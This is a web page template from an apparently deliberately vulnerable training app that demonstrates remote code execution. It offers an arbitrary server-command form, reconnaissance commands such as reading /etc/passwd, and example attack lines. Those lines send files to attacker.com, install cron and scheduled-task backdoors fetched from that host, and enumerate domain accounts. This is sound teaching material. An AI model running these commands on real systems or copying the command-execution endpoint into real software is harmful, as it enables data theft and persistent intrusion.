<!DOCTYPE html>
<html xmlns:th="http://www.thymeleaf.org">
<head>
    <title th:text="${title}">Path Traversal - Remote Code Execution</title>
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/css/bootstrap.min.css" rel="stylesheet">
    <style>
        pre.command-output {
            background-color: #000;
            color: #0f0;
            padding: 15px;
            border-radius: 5px;
            max-height: 400px;
            overflow: auto;
            font-family: 'Courier New', monospace;
            white-space: pre-wrap;
            word-wrap: break-word;
        }
        pre.command-output .error {
            color: #ff5555;
        }
    </style>
</head>
<body>
    <div class="container mt-5">
        <h1 class="mb-4" th:text="${title}">Path Traversal - Remote Code Execution</h1>
        
        <div class="alert alert-danger">
            <strong>Warning:</strong> This page demonstrates how path traversal vulnerabilities can lead to remote code execution.
            This is an extremely dangerous vulnerability that can lead to complete system compromise.
        </div>
        
        <div class="card mb-4">
            <div class="card-header">
                <h5 class="card-title">Execute System Commands</h5>
            </div>
            <div class="card-body">
                <form th:action="@{/pathtraversal/execute}" method="post">
                    <div class="mb-3">
                        <label for="command" class="form-label">Command:</label>
                        <div class="input-group">
                            <span class="input-group-text" th:text="${#strings.contains(#environment.getProperty('os.name'), 'Windows') ? 'cmd.exe /c' : '/bin/sh -c'}">cmd.exe /c</span>
                            <input type="text" class="form-control" id="command" name="command" 
                                   placeholder="Enter system command to execute" th:value="${command}">
                            <button type="submit" class="btn btn-danger">Execute</button>
                        </div>
                        <div class="form-text text-danger">
                            Extremely dangerous: This allows executing arbitrary commands on the server
                        </div>
                    </div>
                </form>
                
                <div th:if="${executionError}" class="alert alert-danger mt-3">
                    <strong>Error:</strong> <span th:text="${executionError}">Error executing command.</span>
                </div>
                
                <div th:if="${command != null}" class="mt-4">
                    <h5>Command Output:</h5>
                    <div class="d-flex justify-content-between align-items-center mb-2">
                        <span>Exit Code: <span th:class="${exitCode == 0 ? 'text-success' : 'text-danger'}" th:text="${exitCode}">0</span></span>
                        <button class="btn btn-sm btn-outline-secondary" onclick="copyOutput()">Copy Output</button>
                    </div>
                    <pre class="command-output" id="commandOutput"><span th:text="${output}">Command output</span><span th:if="${error}" class="error" th:text="${error}">Error output</span></pre>
                </div>
            </div>
        </div>
        
        <div class="card mb-4">
            <div class="card-header">
                <h5 class="card-title">Common Commands</h5>
            </div>
            <div class="card-body">
                <div class="row">
                    <div class="col-md-6">
                        <h6>Windows Commands</h6>
                        <table class="table table-sm">
                            <thead>
                                <tr>
                                    <th>Command</th>
                                    <th>Description</th>
                                    <th>Action</th>
                                </tr>
                            </thead>
                            <tbody>
                                <tr>
                                    <td><code>dir</code></td>
                                    <td>List files in current directory</td>
                                    <td><button class="btn btn-sm btn-outline-danger" onclick="setCommand('dir')">Use</button></td>
                                </tr>
                                <tr>
                                    <td><code>whoami</code></td>
                                    <td>Show current user</td>
                                    <td><button class="btn btn-sm btn-outline-danger" onclick="setCommand('whoami')">Use</button></td>
                                </tr>
                                <tr>
                                    <td><code>ipconfig</code></td>
                                    <td>Show network configuration</td>
                                    <td><button class="btn btn-sm btn-outline-danger" onclick="setCommand('ipconfig')">Use</button></td>
                                </tr>
                                <tr>
                                    <td><code>systeminfo</code></td>
                                    <td>Show system information</td>
                                    <td><button class="btn btn-sm btn-outline-danger" onclick="setCommand('systeminfo')">Use</button></td>
                                </tr>
                                <tr>
                                    <td><code>netstat -ano</code></td>
                                    <td>Show network connections</td>
                                    <td><button class="btn btn-sm btn-outline-danger" onclick="setCommand('netstat -ano')">Use</button></td>
                                </tr>
                                <tr>
                                    <td><code>type C:\Windows\win.ini</code></td>
                                    <td>Read Windows initialization file</td>
                                    <td><button class="btn btn-sm btn-outline-danger" onclick="setCommand('type C:\\Windows\\win.ini')">Use</button></td>
                                </tr>
                            </tbody>
                        </table>
                    </div>
                    <div class="col-md-6">
                        <h6>Linux/Unix Commands</h6>
                        <table class="table table-sm">
                            <thead>
                                <tr>
                                    <th>Command</th>
                                    <th>Description</th>
                                    <th>Action</th>
                                </tr>
                            </thead>
                            <tbody>
                                <tr>
                                    <td><code>ls -la</code></td>
                                    <td>List all files with details</td>
                                    <td><button class="btn btn-sm btn-outline-danger" onclick="setCommand('ls -la')">Use</button></td>
                                </tr>
                                <tr>
                                    <td><code>id</code></td>
                                    <td>Show user identity</td>
                                    <td><button class="btn btn-sm btn-outline-danger" onclick="setCommand('id')">Use</button></td>
                                </tr>
                                <tr>
                                    <td><code>ifconfig</code></td>
                                    <td>Show network configuration</td>
                                    <td><button class="btn btn-sm btn-outline-danger" onclick="setCommand('ifconfig')">Use</button></td>
                                </tr>
                                <tr>
                                    <td><code>uname -a</code></td>
                                    <td>Show system information</td>
                                    <td><button class="btn btn-sm btn-outline-danger" onclick="setCommand('uname -a')">Use</button></td>
                                </tr>
                                <tr>
                                    <td><code>netstat -tulpn</code></td>
                                    <td>Show network connections</td>
                                    <td><button class="btn btn-sm btn-outline-danger" onclick="setCommand('netstat -tulpn')">Use</button></td>
                                </tr>
                                <tr>
                                    <td><code>cat /etc/passwd</code></td>
                                    <td>Read user accounts</td>
                                    <td><button class="btn btn-sm btn-outline-danger" onclick="setCommand('cat /etc/passwd')">Use</button></td>
                                </tr>
                            </tbody>
                        </table>
                    </div>
                </div>
            </div>
        </div>
        
        <div class="card mb-4">
            <div class="card-header">
                <h5 class="card-title">Advanced Attack Scenarios</h5>
            </div>
            <div class="card-body">
                <div class="accordion" id="attackScenarios">
                    <div class="accordion-item">
                        <h2 class="accordion-header" id="headingOne">
                            <button class="accordion-button collapsed" type="button" data-bs-toggle="collapse" data-bs-target="#scenarioOne">
                                Data Exfiltration
                            </button>
                        </h2>
                        <div id="scenarioOne" class="accordion-collapse collapse" data-bs-parent="#attackScenarios">
                            <div class="accordion-body">
                                <p>An attacker could exfiltrate sensitive data from the system:</p>
                                <pre class="bg-light p-3">
# Windows
powershell -c "Invoke-WebRequest -Uri 'https://attacker.com/exfil' -Method POST -Body (Get-Content C:\path\to\sensitive\file.txt)"

# Linux
curl -X POST -d "$(cat /path/to/sensitive/file)" https://attacker.com/exfil</pre>
                            </div>
                        </div>
                    </div>
                    
                    <div class="accordion-item">
                        <h2 class="accordion-header" id="headingTwo">
                            <button class="accordion-button collapsed" type="button" data-bs-toggle="collapse" data-bs-target="#scenarioTwo">
                                Persistent Access
                            </button>
                        </h2>
                        <div id="scenarioTwo" class="accordion-collapse collapse" data-bs-parent="#attackScenarios">
                            <div class="accordion-body">
                                <p>An attacker could establish persistent access to the system:</p>
                                <pre class="bg-light p-3">
# Windows
powershell -c "schtasks /create /tn 'Windows Update' /tr 'powershell -c \"Invoke-WebRequest -Uri https://attacker.com/backdoor.ps1 | iex\"' /sc hourly"

# Linux
echo "* * * * * curl -s https://attacker.com/backdoor.sh | bash" > /tmp/crontab_backdoor && crontab /tmp/crontab_backdoor</pre>
                            </div>
                        </div>
                    </div>
                    
                    <div class="accordion-item">
                        <h2 class="accordion-header" id="headingThree">
                            <button class="accordion-button collapsed" type="button" data-bs-toggle="collapse" data-bs-target="#scenarioThree">
                                Lateral Movement
                            </button>
                        </h2>
                        <div id="scenarioThree" class="accordion-collapse collapse" data-bs-parent="#attackScenarios">
                            <div class="accordion-body">
                                <p>An attacker could move laterally within the network:</p>
                                <pre class="bg-light p-3">
# Windows
net view /all /domain
net user /domain
net group "Domain Admins" /domain

# Linux
for ip in $(seq 1 254); do ping -c 1 192.168.1.$ip | grep "64 bytes"; done</pre>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
        
        <div class="mt-4">
            <a th:href="@{/pathtraversal}" class="btn btn-outline-secondary">Back to Path Traversal Demo</a>
            <a th:href="@{/pathtraversal/writefile}" class="btn btn-outline-primary">Try File Writing</a>
        </div>
    </div>
    
    <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/js/bootstrap.bundle.min.js"></script>
    <script>
        function setCommand(cmd) {
            document.getElementById('command').value = cmd;
        }
        
        function copyOutput() {
            const output = document.getElementById('commandOutput').innerText;
            navigator.clipboard.writeText(output).then(() => {
                alert('Output copied to clipboard');
            });
        }
    </script>
</body>
</html> 